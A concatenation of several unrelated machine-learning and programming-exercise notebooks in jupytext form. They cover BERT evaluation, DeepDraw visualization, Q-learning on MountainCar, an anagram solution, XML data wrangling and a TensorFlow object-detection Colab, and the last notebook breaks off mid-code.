print(len(test_sent)) print('Max sentence length: ', max([len(sen) for sen in test_sent])) snli_testloader, _ = snli_dataloader(test_sent, labels, "test") print(len(snli_testloader)) test_acc = 0.0 steps = 0 # + id="Ep9WT0-Z5gjJ" colab_type="code" colab={} ######### Performance over Test set ############## bert_model.eval() for batch in snli_testloader: batch = tuple(t.to(device) for t in batch) batch_data, batch_mask, batch_labels = batch with torch.no_grad(): preds = bert_model(batch_data, token_type_ids=None, attention_mask=batch_mask) logits = preds[0] logits = logits.detach().cpu() targets = batch_labels.to('cpu') acc = compute_accuracy(logits, targets) test_acc += acc steps += 1 print("final test set accuracy is ", (test_acc / steps))
BERT_snli.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [default] # language: python # name: python2 # --- # ### Visualizing Action Classes Learned with RGB Flow Models # # This notebook is adapted from the original DeepDraw notebook. In particular, this notebook generates RGB images from action recognition models trained on RGB frames. The output is a image refelecting the knowledge in the model of a specific action class. # # ------ # # # This is an ipython notebook to generate visualizations of classes with GoogLeNet, for some more info refer to [this blogpost](http://auduno.com/post/125362849838/visualizing-googlenet-classes), and for some examples of generated images see [this](https://goo.gl/photos/8qcvjnYBQVSGG2eN6) album of highlights or [this](https://goo.gl/photos/FfsZZektqpZkdDnKA) album of all 1000 imagenet classes. # # To run this code, you'll need an installation of Caffe with built pycaffe libraries, as well as the python libraries numpy, scipy and PIL. For instructions on how to install Caffe and pycaffe, refer to the installation guide [here](http://caffe.berkeleyvision.org/installation.html). Before running the ipython notebooks, you'll also need to download the [bvlc_googlenet model](https://github.com/BVLC/caffe/tree/master/models/bvlc_googlenet), and modify the variables ```pycaffe_root``` to refer to the path of your pycaffe installation (if it's not already in your python path) and ```model_path``` to refer to the path of the googlenet caffe model. Also uncomment the line that enables GPU mode if you have built Caffe with GPU-support and a suitable GPU available. # caffe_path = '/path/to/caffe_root' tsn_path = '/path/to/tsn' save_path = '' # which action class to visualize (0-based), to view the class name, see <tsn_path>/data/ucf101_splits/classInd.txt action_class = 48 # + # imports and basic notebook setup from cStringIO import StringIO import numpy as np import os,re,random import scipy.ndimage as nd import PIL.Image import sys from IPython.display import clear_output, Image, display from scipy.misc import imresize pycaffe_root = caffe_path+"/python" sys.path.insert(0, pycaffe_root) import caffe model_name = "TSN-BN-Inception-RGB" net_fn = './tsn_bn_inception_rgb_deploy.prototxt' param_fn = tsn_path+'models/ucf101_split1_tsn_rgb_reference_bn_inception.caffemodel' mean = np.float32([104.0, 117.0, 123.0]) caffe.set_mode_gpu() # uncomment this if gpu processing is available caffe.set_device(0) net = caffe.Classifier(net_fn, param_fn, mean = mean, # ImageNet mean, training set dependent channel_swap = (2,1,0)) # the reference model has channels in BGR order instead of RGB # a couple of utility functions for converting to and from Caffe's input image layout def preprocess(net, img): return np.float32(np.rollaxis(img, 2)[::-1]) - net.transformer.mean['data'] def deprocess(net, img): return np.dstack((img + net.transformer.mean['data'])[::-1]) def blur(img, sigma): if sigma > 0: img[0] = nd.filters.gaussian_filter(img[0], sigma, order=0) img[1] = nd.filters.gaussian_filter(img[1], sigma, order=0) img[2] = nd.filters.gaussian_filter(img[2], sigma, order=0) return img def showarray(a, f, fmt='jpeg'): a = np.uint8(np.clip(a, 0, 255)) f = StringIO() PIL.Image.fromarray(a).save(f, fmt) display(Image(data=f.getvalue())) # - # Definition of the main gradient ascent functions. Note that these are based on the [deepdream code](https://github.com/google/deepdream/blob/master/dream.ipynb) published by Google as well as [this code](https://github.com/kylemcdonald/deepdream/blob/master/dream.ipynb) by <NAME>. # + def make_step(net, step_size=1.5, end='inception_4c/output', clip=True, focus=None, sigma=None): '''Basic gradient ascent step.''' src = net.blobs['data'] # input image is stored in Net's 'data' blob dst = net.blobs[end] net.forward(end=end) one_hot = np.zeros_like(dst.data) one_hot.flat[focus] = 1. dst.diff[:] = one_hot net.backward(start=end) g = src.diff[0] src.data[:] += step_size/np.abs(g).mean() * g if clip: bias = net.transformer.mean['data'] src.data[:] = np.clip(src.data, -bias, 255-bias) src.data[0] = blur(src.data[0], sigma) # reset objective for next step dst.diff.fill(0.) def deepdraw(net, base_img, octaves, random_crop=True, visualize=True, focus=None, clip=True, **step_params): # prepare base image image = preprocess(net, base_img) # (3,224,224) # get input dimensions from net w = net.blobs['data'].width h = net.blobs['data'].height print "starting drawing" src = net.blobs['data'] src.reshape(1,3,h,w) # resize the network's input image size for e,o in enumerate(octaves): if 'scale' in o: # resize by o['scale'] if it exists image = nd.zoom(image, (1,o['scale'],o['scale'])) _,imw,imh = image.shape # select layer layer = o['layer'] for i in xrange(o['iter_n']): if imw > w: if random_crop: # randomly select a crop #ox = random.randint(0,imw-224) #oy = random.randint(0,imh-224) mid_x = (imw-w)/2. width_x = imw-w ox = np.random.normal(mid_x, width_x*0.3, 1) ox = int(np.clip(ox,0,imw-w)) mid_y = (imh-h)/2. width_y = imh-h oy = np.random.normal(mid_y, width_y*0.3, 1) oy = int(np.clip(oy,0,imh-h)) # insert the crop into src.data[0] src.data[0] = image[:,ox:ox+w,oy:oy+h] else: ox = (imw-w)/2. oy = (imh-h)/2. src.data[0] = image[:,ox:ox+w,oy:oy+h] else: ox = 0 oy = 0 src.data[0] = image.copy() sigma = o['start_sigma'] + ((o['end_sigma'] - o['start_sigma']) * i) / o['iter_n'] step_size = o['start_step_size'] + ((o['end_step_size'] - o['start_step_size']) * i) / o['iter_n'] make_step(net, end=layer, clip=clip, focus=focus, sigma=sigma, step_size=step_size) if visualize: vis = deprocess(net, src.data[0]) if not clip: # adjust image contrast if clipping is disabled vis = vis*(255.0/np.percentile(vis, 99.98)) if i % 1 == 0: showarray(vis,"./filename"+str(i)+".jpg") if i % 50 == 0 or i ==o['iter_n']-1: print 'finished step %d in octave %d' % (i,e) # insert modified image back into original image (if necessary) image[:,ox:ox+w,oy:oy+h] = src.data[0] print "octave %d image:" % e showarray(deprocess(net, image),"./octave_"+str(e)+".jpg") # returning the resulting image return deprocess(net, image) # - # #### Generating the class visualizations # # The ```octaves``` list determines in which order we optimize layers, as well as how many iterations and scaling on each octave. For each octave, parameters are: # * ```layer``` : which layer to optimize # * ```iter_n``` : how many iterations # * ```scale``` : by what factor (if any) to scale up the base image before proceeding # * ```start_sigma``` : the initial radius of the gaussian blur # * ```end_sigma``` : the final radius of the gaussian blur # * ```start_step_size``` : the initial step size of the gradient ascent # * ```end_step_size``` : the final step size of the gradient ascent # # The choice of octave parameters below will give decent images, and is the one used for visualizations in the blogpost. However, the choice of parameters was a bit arbitrary, so feel free to experiment. Note that generating an image will take around 1 minute with GPU-enabled Caffe, or 10-15 minutes if you're running purely on CPU, depending on your computer performance. # + # these octaves determine gradient ascent steps octaves = [ { 'layer':'fc-action', 'iter_n':190, 'start_sigma':2.5, 'end_sigma':0.78, 'start_step_size':11., 'end_step_size':11. }, { 'layer':'fc-action', 'scale':1.2, 'iter_n':150, 'start_sigma':0.78*1.2, 'end_sigma':0.5, 'start_step_size':6., 'end_step_size':6. }, { 'layer':'fc-action', 'scale':1.2, 'iter_n':150, 'start_sigma':0.78*1.2, 'end_sigma':0.44, 'start_step_size':6., 'end_step_size':3. }, { 'layer':'fc-action', 'iter_n':10, 'start_sigma':0.44, 'end_sigma':0.304, 'start_step_size':3., 'end_step_size':3. } ] # get original input size of network original_w = net.blobs['data'].width original_h = net.blobs['data'].height # the background color of the initial image background_color = np.float32([200.0, 200.0, 200.0]) # generate initial random image gen_image = np.random.normal(background_color, 12, (original_w, original_h, 3)) # generate class visualization via octavewise gradient ascent gen_image = deepdraw(net, gen_image, octaves, focus=action_class, random_crop=True, visualize=False) # save image import os img_fn = os.path.join(save_path, '_'.join(["tsn_visualization_rgb", str(action_class)+'.png'])) PIL.Image.fromarray(np.uint8(gen_image)).save(img_fn) # -
deepdraw-TSN-RGB.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:openmined2] # language: python # name: conda-env-openmined2-py # --- # + import socketio sio = socketio.Client() sio.connect('http://localhost:5000') # - def send_ack(): sio.emit('client_ack', 'android') send_ack()
examples/android/Android Proxy.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.8.10 64-bit (''dennybritz-reinforcement-learning-vHFc5M9T'': # pipenv)' # name: python3 # --- # + # %matplotlib inline import gym import itertools import matplotlib import numpy as np import sys import sklearn.pipeline import sklearn.preprocessing if "../" not in sys.path: sys.path.append("../") from lib import plotting from sklearn.linear_model import SGDRegressor from sklearn.kernel_approximation import RBFSampler matplotlib.style.use('ggplot') # - env = gym.envs.make("MountainCar-v0") # + # Feature Preprocessing: Normalize to zero mean and unit variance # We use a few samples from the observation space to do this observation_examples = np.array([env.observation_space.sample() for x in range(10000)]) scaler = sklearn.preprocessing.StandardScaler() scaler.fit(observation_examples) # Used to convert a state to a featurizes represenation. # We use RBF kernels with different variances to cover different parts of the space featurizer = sklearn.pipeline.FeatureUnion([ ("rbf1", RBFSampler(gamma=5.0, n_components=100)), ("rbf2", RBFSampler(gamma=2.0, n_components=100)), ("rbf3", RBFSampler(gamma=1.0, n_components=100)), ("rbf4", RBFSampler(gamma=0.5, n_components=100)) ]) featurizer.fit(scaler.transform(observation_examples)) # - class Estimator(): """ Value Function approximator. """ def __init__(self): # We create a separate model for each action in the environment's # action space. Alternatively we could somehow encode the action # into the features, but this way it's easier to code up. self.models = [] for _ in range(env.action_space.n): model = SGDRegressor(learning_rate="constant") # We need to call partial_fit once to initialize the model # or we get a NotFittedError when trying to make a prediction # This is quite hacky. model.partial_fit([self.featurize_state(env.reset())], [0]) self.models.append(model) def featurize_state(self, state): """ Returns the featurized representation for a state. """ scaled = scaler.transform([state]) featurized = featurizer.transform(scaled) return featurized[0] def predict(self, s, a=None): """ Makes value function predictions. Args: s: state to make a prediction for a: (Optional) action to make a prediction for Returns If an action a is given this returns a single number as the prediction. If no action is given this returns a vector or predictions for all actions in the environment where pred[i] is the prediction for action i. """ features = self.featurize_state(s) if not a: return np.array([m.predict([features])[0] for m in self.models]) else: return self.models[a].predict([features])[0] def update(self, s, a, y): """ Updates the estimator parameters for a given state and action towards the target y. """ features = self.featurize_state(s) self.models[a].partial_fit([features], [y]) def make_epsilon_greedy_policy(estimator, epsilon, nA): """ Creates an epsilon-greedy policy based on a given Q-function approximator and epsilon. Args: estimator: An estimator that returns q values for a given state epsilon: The probability to select a random action . float between 0 and 1. nA: Number of actions in the environment. Returns: A function that takes the observation as an argument and returns the probabilities for each action in the form of a numpy array of length nA. """ def policy_fn(observation): A = np.ones(nA, dtype=float) * epsilon / nA q_values = estimator.predict(observation) best_action = np.argmax(q_values) A[best_action] += (1.0 - epsilon) return A return policy_fn def q_learning(env, estimator, num_episodes, discount_factor=1.0, epsilon=0.1, epsilon_decay=1.0): """ Q-Learning algorithm for fff-policy TD control using Function Approximation. Finds the optimal greedy policy while following an epsilon-greedy policy. Args: env: OpenAI environment. estimator: Action-Value function estimator num_episodes: Number of episodes to run for. discount_factor: Gamma discount factor. epsilon: Chance the sample a random action. Float betwen 0 and 1. epsilon_decay: Each episode, epsilon is decayed by this factor Returns: An EpisodeStats object with two numpy arrays for episode_lengths and episode_rewards. """ # Keeps track of useful statistics stats = plotting.EpisodeStats( episode_lengths=np.zeros(num_episodes), episode_rewards=np.zeros(num_episodes)) for i_episode in range(num_episodes): # The policy we're following policy = make_epsilon_greedy_policy( estimator, epsilon * epsilon_decay**i_episode, env.action_space.n) # Print out which episode we're on, useful for debugging. # Also print reward for last episode last_reward = stats.episode_rewards[i_episode - 1] sys.stdout.flush() # Reset the environment and pick the first action state = env.reset() # Only used for SARSA, not Q-Learning next_action = None # One step in the environment for t in itertools.count(): # Choose an action to take # If we're using SARSA we already decided in the previous step if next_action is None: action_probs = policy(state) action = np.random.choice(np.arange(len(action_probs)), p=action_probs) else: action = next_action # Take a step next_state, reward, done, _ = env.step(action) # Update statistics stats.episode_rewards[i_episode] += reward stats.episode_lengths[i_episode] = t # TD Update q_values_next = estimator.predict(next_state) # Use this code for Q-Learning # Q-Value TD Target td_target = reward + discount_factor * np.max(q_values_next) # Use this code for SARSA TD Target for on policy-training: # next_action_probs = policy(next_state) # next_action = np.random.choice(np.arange(len(next_action_probs)), p=next_action_probs) # td_target = reward + discount_factor * q_values_next[next_action] # Update the function approximator using our target estimator.update(state, action, td_target) print("\rStep {} @ Episode {}/{} ({})".format(t, i_episode + 1, num_episodes, last_reward), end="") if done: break state = next_state return stats estimator = Estimator() # Note: For the Mountain Car we don't actually need an epsilon > 0.0 # because our initial estimate for all states is too "optimistic" which leads # to the exploration of all states. stats = q_learning(env, estimator, 100, epsilon=0.0) plotting.plot_cost_to_go_mountain_car(env, estimator) plotting.plot_episode_stats(stats, smoothing_window=25)
6. FA/Q-Learning with Value Function Approximation Solution.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import torch import torch.nn as nn import numpy as np from copy import deepcopy class MLP(nn.Module): def __init__(self, num_series, lag, hidden, activation): super(MLP, self).__init__() self.activation = activation_helper(activation) # Set up network. layer = nn.Conv1d(num_series, hidden[0], lag) modules = [layer] for d_in, d_out in zip(hidden, hidden[1:] + [1]): layer = nn.Conv1d(d_in, d_out, 1) modules.append(layer) # Register parameters. self.layers = nn.ModuleList(modules) def forward(self, X): X = X.transpose(2, 1) for i, fc in enumerate(self.layers): if i != 0: X = self.activation(X) X = fc(X) return X.transpose(2, 1) # -
cs224w/ADDfile.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Anagram Solution # # ## Problem # # Given two strings, check to see if they are anagrams. An anagram is when the two strings can be written using the exact same letters (so you can just rearrange the letters to get a different phrase or word). # # For example: # # "public relations" is an anagram of "crap built on lies." # # "clint eastwood" is an anagram of "old west action" # # **Note: Ignore spaces and capitalization. So "d go" is an anagram of "God" and "dog" and "o d g".** # # ## Solution # # There are two ways of thinking about this problem, if two strings have the same frequency of letters/element (meaning each letter shows up the same number of times in both strings) then they are anagrams of eachother. On a similar vien of logic, if two strings are equal to each other once they are sorted, then they are also anagrams of each other. # # You would be able to implement this second solution pretty easily in Python: def anagram(s1,s2): # Remove spaces and lowercase letters s1 = s1.replace(' ','').lower() s2 = s2.replace(' ','').lower() # Return boolean for sorted match. return sorted(s1) == sorted(s2) anagram('dog','god') anagram('clint eastwood','old west action') anagram('aa','bb') # Now the above sorting approach is simple, but is actually not optimal and in an interview setting you would probably be asked to implement a more manual solution involving just counting the number of letters in each string to test your ability to understand hash tables. Let's build out a fuller solution using counting and Python dictionaries: def anagram2(s1,s2): # Remove spaces and lowercase letters s1 = s1.replace(' ','').lower() s2 = s2.replace(' ','').lower() # Edge Case to check if same number of letters if len(s1) != len(s2): return False # Create counting dictionary (Note could use DefaultDict from Collections module) count = {} # Fill dictionary for first string (add counts) for letter in s1: if letter in count: count[letter] += 1 else: count[letter] = 1 # Fill dictionary for second string (subtract counts) for letter in s2: if letter in count: count[letter] -= 1 else: count[letter] = 1 # Check that all counts are 0 for k in count: if count[k] != 0: return False # Otherwise they're anagrams return True anagram2('dog','god') anagram2('clint eastwood','old west action') anagram2('dd','aa') # A quick note on the second solution, the use of defaultdict form the collections module would clean up this code quite a bit, and the final for loop could be built into the second for loop, but in the above implementation every step is very clear. # # Test Your Solution # Run the cell below to test your solution # + """ RUN THIS CELL TO TEST YOUR SOLUTION """ from nose.tools import assert_equal class AnagramTest(object): def test(self,sol): assert_equal(sol('go go go','gggooo'),True) assert_equal(sol('abc','cba'),True) assert_equal(sol('hi man','hi man'),True) assert_equal(sol('aabbcc','aabbc'),False) assert_equal(sol('123','1 2'),False) print "ALL TEST CASES PASSED" # Run Tests t = AnagramTest() t.test(anagram) # - t.test(anagram2) # # Good Job!
code/algorithms/course_udemy_1/Array Sequences/Array Sequences Interview Questions/Array Sequence Interview Questions - SOLUTIONS/Anagram Check - SOLUTION.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # XML example and exercise # **** # + study examples of accessing nodes in XML tree structure # + work on exercise to be completed and submitted # **** # + reference: https://docs.python.org/2.7/library/xml.etree.elementtree.html # + data source: http://www.dbis.informatik.uni-goettingen.de/Mondial # **** from xml.etree import ElementTree as ET # ## XML example # # + for details about tree traversal and iterators, see https://docs.python.org/2.7/library/xml.etree.elementtree.html document_tree = ET.parse( './data/mondial_database_less.xml' ) # print names of all countries for child in document_tree.getroot(): print (child.find('name').text) # print names of all countries and their cities for element in document_tree.iterfind('country'): print ('* ' + element.find('name').text + ':', end=''), capitals_string = '' for subelement in element.getiterator('city'): capitals_string += subelement.find('name').text + ', ' print (capitals_string[:-2]) # **** # ## XML exercise # # Using data in 'data/mondial_database.xml', the examples above, and refering to https://docs.python.org/2.7/library/xml.etree.elementtree.html, find # # 1. 10 countries with the lowest infant mortality rates # 2. 10 cities with the largest population # 3. 10 ethnic groups with the largest overall populations (sum of best/latest estimates over all countries) # 4. name and country of a) longest river, b) largest lake and c) airport at highest elevation document = ET.parse( './data/mondial_database.xml' ) # + # print child and attributes #for child in document.getroot(): # print (child.tag, child.attrib) # - import pandas as pd # Create a list of country and their Infant Mortality Rate country_imr=[] for country in document.getroot().findall('country'): name = country.find('name').text infant_mortality_rate = country.find('infant_mortality') if infant_mortality_rate is not None: infant_mortality_rate=infant_mortality_rate.text else : infant_mortality_rate = -1 country_imr.append((name, (float)(infant_mortality_rate))) # ## 10 countries with the lowest infant mortality rates df = pd.DataFrame(country_imr, columns=['Country', 'Infant_Mortality_Rate']) df_unknown_removed = df[df.Infant_Mortality_Rate != -1] df_unknown_removed.set_index('Infant_Mortality_Rate').sort().head(10) city_population=[] for country in document.iterfind('country'): for state in country.iterfind('province'): for city in state.iterfind('city'): try: city_population.append((city.find('name').text, float(city.find('population').text))) except: next for city in country.iterfind('city'): try: city_population.append((city.find('name').text, float(city.find('population').text))) except: next # ## 10 cities with the largest population df = pd.DataFrame(city_population, columns=['City', 'Population']) #df.info() df.sort_index(by='Population', ascending=False).head(10) # + ethnic_population={} country_population={} for country in document.iterfind('country'): try: country_population[country.find('name').text]= float(country.find('population').text) except: next for state in country.iterfind('province' or 'state'): try: country_population[country.find('name').text] += float(state.find('population').text) except: next for city in state.iterfind('city'): try: country_population[country.find('name').text] += float(city.find('population').text) except: next for country in document.iterfind('country'): for ethnicgroup in country.iterfind('ethnicgroup'): try: if ethnicgroup.text in ethnic_population: ethnic_population[ethnicgroup.text] += country_population[country.find('name').text]*float(ethnicgroup.get('percentage'))/100 else: ethnic_population[ethnicgroup.text] = country_population[country.find('name').text]*float(ethnicgroup.get('percentage'))/100 except: next # - # ## 10 ethnic groups with the largest overall populations (sum of best/latest estimates over all countries) pd.DataFrame(sorted(ethnic_population.items(), key=lambda x:x[1], reverse=True)[:10], columns=['Ethnic_Groups', 'Population']) rivers_list=[] rivers_df = pd.DataFrame() for rivers in document.iterfind('river'): try: rivers_list.append({'name':rivers.find('name').text, 'length':rivers.find('length').text, 'country':rivers.find('located').attrib['country']}) except: next rivers_list
Week_1/DATA_WRANGLING/WORKING_WITH_DATA_IN_FILES/data_wrangling_xml/data_wrangling_xml/.ipynb_checkpoints/sliderule_dsi_xml_exercise-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/fyousseff/youss/blob/master/object_detection_training.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + id="xPtQzslfLM8W" pip list # + colab={"base_uri": "https://localhost:8080/"} id="R7HlSlxeLQrT" outputId="cebf0160-ac8d-4278-b378-7dffd0593c65" # !git clone https://github.com/tensorflow/models.git # + id="oyPKc6vbFv6E" # + colab={"base_uri": "https://localhost:8080/"} id="PZdHvZBrMXMa" outputId="aa221a7d-3e99-40b7-c626-7429ca693fe7" # cd /content/models/research # + id="CxIJIoGYNQow" # !protoc object_detection/protos/*.proto --python_out=. # + colab={"base_uri": "https://localhost:8080/"} id="rHPxbE_uNRC_" outputId="ed28313a-e1ed-4a99-84eb-546d86afd88d" # !git clone https://github.com/cocodataset/cocoapi.git # + colab={"base_uri": "https://localhost:8080/"} id="rGIdbGZ1NSft" outputId="504ede88-32f9-4e45-8f64-9154f6fd381e" # cd cocoapi/PythonAPI # + id="kZVhYVXKNUUA" colab={"base_uri": "https://localhost:8080/"} outputId="32fcadf7-496d-430a-bf61-d517cb45b713" # !make # + id="hbMRVcY7NV_g" # cp -r pycocotools /content/models/research # + colab={"base_uri": "https://localhost:8080/"} id="HzPFTvflNatO" outputId="91483584-3497-46ed-cee3-aeb95b5c0b90" # cd .. # + id="GIsePVSmNeQR" # cp object_detection/packages/tf2/setup.py . # + id="nFD3EiyJNkIj" colab={"base_uri": "https://localhost:8080/"} outputId="e4ba511a-a187-40e2-cf7d-2082ab338893" # !python -m pip install . # + id="vgeq3qvXNmy0" # !python object_detection/builders/model_builder_tf2_test.py # + id="6TN7yJbRHXjW" # + colab={"base_uri": "https://localhost:8080/"} id="lidb7zbmOGBK" outputId="c350fca7-83f0-46c3-e75e-4f367357d6a1" # !wget http://download.tensorflow.org/models/object_detection/tf2/20200711/ssd_resnet50_v1_fpn_640x640_coco17_tpu-8.tar.gz # + colab={"base_uri": "https://localhost:8080/"} id="IjSiSZpcOVXz" outputId="e3356401-eadd-412f-f96a-0c8a5b2356e7" # ! tar -xvf ssd_resnet50_v1_fpn_640x640_coco17_tpu-8.tar.gz # + colab={"base_uri": "https://localhost:8080/"} id="FYZkPMGNJtx2" outputId="0126d255-32de-4b0d-ec57-9d4a1a89c257" # !python generate_tfrecord.py -x /content/workspace/training_demo/images/train -l /content/workspace/training_demo/annotations/label_map.pbtxt -o /content/workspace/training_demo/annotations/train.record # + colab={"base_uri": "https://localhost:8080/"} id="ZaATYcOxUnc3" outputId="5bea6900-0a18-44e0-a351-d0c6962fc9c3" # !python generate_tfrecord.py -x /content/workspace/training_demo/images/test -l /content/workspace/training_demo/annotations/label_map.pbtxt -o /content/workspace/training_demo/annotations/test.record # + id="P3J9tFOeVoB2" # !python model_main_tf2.py --model_dir=models/my_ssd_resnet50_v1_fpn --pipeline_config_path=models/my_ssd_resnet50_v1_fpn/pipeline.config # + id="fgIqEGCoVtZW" # !python exporter_main_v2.py --input_type image_tensor --pipeline_config_path /content/workspace/training_demo/models/my_ssd_resnet50_v1_fpn/pipeline.config --trained_checkpoint_dir /content/workspace/training_demo/models/my_ssd_resnet50_v1_fpn --output_directory /content/workspace/training_demo/exported-models # + [markdown] id="AKmIetvDQRZV" # # New Section # + [markdown] id="NVtyt-KROqJk" # Object Detection (On Image) From TF2 Saved Model # # + id="rPm9hlskpJfb" """ Object Detection (On Image) From TF2 Saved Model ===================================== """ import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # Suppress TensorFlow logging (1) import pathlib import tensorflow as tf import cv2 import argparse from google.colab.patches import cv2_imshow # Enable GPU dynamic memory allocation gpus = tf.config.experimental.list_physical_devices('GPU') for gpu in gpus: tf.config.experimental.set_memory_growth(gpu, True) # PROVIDE PATH TO IMAGE DIRECTORY IMAGE_PATHS = '/content/workspace/training_demo/images/test/playing_card.e7ce63fa-123b-11ec-8fc8-9829a63df29a.jpg' # PROVIDE PATH TO MODEL DIRECTORY PATH_TO_MODEL_DIR = '/content/workspace/training_demo/exported-models' # PROVIDE PATH TO LABEL MAP PATH_TO_LABELS = '/content/workspace/training_demo/annotations/label_map.pbtxt' # PROVIDE THE MINIMUM CONFIDENCE THRESHOLD MIN_CONF_THRESH = float(0.60) # LOAD THE MODEL import time from object_detection.utils import label_map_util from object_detection.utils import visualization_utils as viz_utils PATH_TO_SAVED_MODEL = PATH_TO_MODEL_DIR + "/saved_model" print('Loading model...', end='') start_time = time.time() # LOAD SAVED MODEL AND BUILD DETECTION FUNCTION detect_fn = tf.saved_model.load(PATH_TO_SAVED_MODEL) end_time = time.time() elapsed_time = end_time - start_time print('Done! Took {} seconds'.format(elapsed_time)) # LOAD LABEL MAP DATA FOR PLOTTING category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True) import numpy as np from PIL import Image import matplotlib.pyplot as plt import warnings warnings.filterwarnings('ignore') # Suppress Matplotlib warnings def load_image_into_numpy_array(path): """Load an image from file into a numpy array. Puts image into numpy array to feed into tensorflow graph. Note that by convention we put it into a numpy array with shape (height, width, channels), where channels=3 for RGB. Args: path: the file path to the image Returns: uint8 numpy array with shape (img_height, img_width, 3) """ return np.array(Image.open(path)) print('Running inference for {}... '.format(IMAGE_PATHS), end='') image = cv2.imread(IMAGE_PATHS) image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image_expanded = np.expand_dims(image_rgb, axis=0) # The input needs to be a tensor, convert it using `tf.convert_to_tensor`. input_tensor = tf.convert_to_tensor(image) # The model expects a batch of images, so add an axis with `tf.newaxis`. input_tensor = input_tensor[tf.newaxis, ...] # input_tensor = np.expand_dims(image_np, 0) detections = detect_fn(input_tensor) # All outputs are batches tensors. # Convert to numpy arrays, and take index [0] to remove the batch dimension. # We're only interested in the first num_detections. num_detections = int(detections.pop('num_detections')) detections = {key: value[0, :num_detections].numpy() for key, value in detections.items()} detections['num_detections'] = num_detections # detection_classes should be ints. detections['detection_classes'] = detections['detection_classes'].astype(np.int64) image_with_detections = image.copy() # SET MIN_SCORE_THRESH BASED ON YOU MINIMUM THRESHOLD FOR DETECTIONS viz_utils.visualize_boxes_and_labels_on_image_array( image_with_detections, detections['detection_boxes'], detections['detection_classes'], detections['detection_scores'], category_index, use_normalized_coordinates=True, max_boxes_to_draw=200, min_score_thresh=0.5, agnostic_mode=False) print('Done') # DISPLAYS OUTPUT IMAGE cv2_imshow(image_with_detections) # CLOSES WINDOW ONCE KEY IS PRESSED # + id="qOrWmwE1Np1J" # + [markdown] id="uiZ8FhC5QhVG" # detect object live # + id="Cguu5lCHOxpz" import numpy as np import os import six.moves.urllib as urllib import sys import tarfile import tensorflow as tf import zipfile from collections import defaultdict from io import StringIO from matplotlib import pyplot as plt from PIL import Image from IPython.display import display from object_detection.utils import ops as utils_ops from object_detection.utils import label_map_util from object_detection.utils import visualization_utils as vis_util # + id="fU64ztJEQoq1" # patch tf1 into `utils.ops` utils_ops.tf = tf.compat.v1 # Patch the location of gfile tf.gfile = tf.io.gfile # + id="aSyktlDSQuQ5" def load_model(model_name): base_url = 'http://download.tensorflow.org/models/object_detection/' model_file = model_name + '.tar.gz' model_dir = tf.keras.utils.get_file( fname=model_name, origin=base_url + model_file, untar=True) model_dir = pathlib.Path(model_dir)/"saved_model" model = tf.saved_model.load(str(model_dir)) model = model.signatures['serving_default'] return model # + colab={"base_uri": "https://localhost:8080/", "height": 35} id="uxb4yeuCSvJi" outputId="7e3b4dc4-7724-45a0-c577-9163ff286876" pwd # + [markdown] id="mgfe5XSrQxsZ" # ### Loading label map # Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine # + id="PQFGI2ugQyVJ" # List of the strings that is used to add correct label for each box. PATH_TO_LABELS = '/content/models/research/object_detection/data/mscoco_label_map.pbtxt' category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True) # + id="-0E1ZPkPQ4Td" detection_model = tf.saved_model.load("/content/workspace/training_demo/exported-models/playcardphone/saved_model") detection_model = detection_model.signatures['serving_default'] # + [markdown] id="PnOlzIoJQ83t" # # Check the model's input signature, it expects a batch of 3-color images of type uint8: # + colab={"base_uri": "https://localhost:8080/"} id="gVPNosp5Q-7h" outputId="7e69a31f-f4bd-4b0b-e678-5e69af9c912e" print(detection_model.inputs) # + [markdown] id="LqNDvdryRBPy" # # # ``` # # This is formatted as code # ``` # # And retuns several outputs: # + colab={"base_uri": "https://localhost:8080/"} id="dKhksxk1RDEn" outputId="40113c25-7504-403c-c648-3576f00692ac" detection_model.output_dtypes # + id="IOBIdgHyREc4" detection_model.output_shapes # + [markdown] id="iSzWfz6WRG0O" # [link text](https://)Add a wrapper function to call the model, and cleanup the outputs: # + id="yMNDivp7RJKU" def run_inference_for_single_image(model, image): image = np.asarray(image) # The input needs to be a tensor, convert it using `tf.convert_to_tensor`. input_tensor = tf.convert_to_tensor(image) # The model expects a batch of images, so add an axis with `tf.newaxis`. input_tensor = input_tensor[tf.newaxis,...] # Run inference output_dict = model(input_tensor) # All outputs are batches tensors. # Convert to numpy arrays, and take index [0] to remove the batch dimension. # We're only interested in the first num_detections. num_detections = int(output_dict.pop('num_detections')) output_dict = {key:value[0, :num_detections].numpy() for key,value in output_dict.items()} output_dict['num_detections'] = num_detections # detection_classes should be ints. output_dict['detection_classes'] = output_dict['detection_classes'].astype(np.int64) # Handle models with masks: if 'detection_masks' in output_dict: # Reframe the the bbox mask to the image size. detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks( output_dict['detection_masks'], output_dict['detection_boxes'], image.shape[0], image.shape[1]) detection_masks_reframed = 